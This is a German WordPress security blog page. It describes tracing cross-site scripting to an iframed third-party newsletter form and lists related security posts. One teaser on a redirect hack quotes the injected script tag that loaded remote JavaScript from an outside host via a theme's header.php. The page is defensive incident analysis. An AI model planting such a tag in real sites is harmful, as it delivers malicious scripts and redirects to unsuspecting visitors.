Sicherheit

Cross Site Scripting in Drittanbieterformular

vonGabriele Lässer
railroad crossing sign 1008168 1920

Google sperrte eine Artikelseite eines Online-Magazins wegen Malware. Beim Scannen der WordPress-Dateien mit verschiedenen Tools wurde jedoch nichts Verdächtiges gefunden.

Failed to execute ‘write’ on ‘Document’: It isn’t possible to write into a document from an asynchronously-loaded external script unless it is explicitly opened.

Diese in der Chrome Console angezeigte Meldung führte mich schließlich zum Schadcode. Betroffen vom Cross Site Scripting war keine WordPress-Datei, sondern das Newsletterformular eines Drittanbieters (keiner der üblichen, schien handgestrickt und auch schon älter zu sein), das über einen Iframe eingebunden worden war.

weiter schmökern

Kunden und Leser | Sicherheit

Wie ändert man die Admin-E-Mail-Adresse in WordPress, ohne dass sie bestätigt werden muss?

vonGabriele Lässer

Es ist üblich und sinnvoll, dass man ein neues WordPress unter der E-Mail-Adresse installiert, die man selbst benutzt. Gleich nach der Installation gehen E-Mails ein. Das stellt auch gleich die Gewissheit her, dass wp_mail() in der gewählten Umgebung funktioniert. Die E-Mail-Adresse des Erstuseres ist nicht nur die E-Mail-Adresse des Benutzers, sondern wird auch als Admin-E-Mail…

Sicherheit

WordPress-Hack behoben: Weiterleitung eines WordPress Blogs zu baidu.com

vonGabriele Lässer

Fall von heute Vormittag: Rief man die Blogadresse auf, landete man nach einem Redirekt bei einer chinesischen Suchmaschine. Scanner fanden nichts. Die Ursache war in die header.php des Themes eingeschleust worden: ><script type="text/javascript" src="http://system-bloglic.com/dl/bloglic_script.js"></script> (auf welchem Weg gilt es noch zu ermitteln, das Theme war schon etwas älter, und mindestens ein Plugin noch von einer…

Sicherheit | WordPress | WP-Plugins

WordPress Daten und Dateien – was sollte man unbedingt sichern?

vonGabriele Lässer

Der Hinweis auf eine neue WordPress-Version ist immer auch mit der Empfehlung verbunden, vorher unbedingt Backups seiner Datenbank und Dateien vorzunehmen. Auch wenn WordPress-Updates meistens problemlos über die Bühne gehen, das Thema Backup kann man nur dann ausklammern, wenn der Verlust sämtlicher Daten und Arbeit die man in seine Website investierte, verschmerzbar ist. – Das…

Kunden und Leser | Sicherheit | WordPress

Ist der Betrieb eines CMS wie WordPress überhaupt noch sicher?

vonGabriele Lässer

Nicht zuletzt weil ich mich 2014 ausgiebig mit dem Thema Sicherheit auseinandersetzte, war mein Eindruck, noch nie so viele Berichte über Sicherheitslücken und sich ausbreitende Malware-Infektionen gelesen zu haben als in diesem Jahr. Da wundert es nicht, wenn sich Unsicherheit bei Websitebetreibern breit macht – sofern sie überhaupt davon erfahren. Nicht jeder Betreiber einer CMS-basierten…

Kunden und Leser | Sicherheit

WordPress: Wie kann ich das Sicherheitsrisiko admin (ID#1) loswerden?

vonGabriele Lässer

Der Site-Administrator namens admin wurde früher bei WordPress-Installationen automatisch als Standard-User mit der ID #1 erzeugt, und später noch eine Weile vorgeschlagen, als man den Namen bereits frei wählen konnte. Aus Sicherheitsgründen muss heute bei der frischen Installation einer aktuellen WordPress-Version ein Administrator-Name definiert werden. Aber es gibt noch zahlreiche WordPress-Sites in denen admin der…

Schreibe einen Kommentar

Bitte Kommentarfunktion nicht für Supportanfragen nutzen. Dem kann hier nicht entsprochen werden.

Deine E-Mail-Adresse wird nicht veröffentlicht.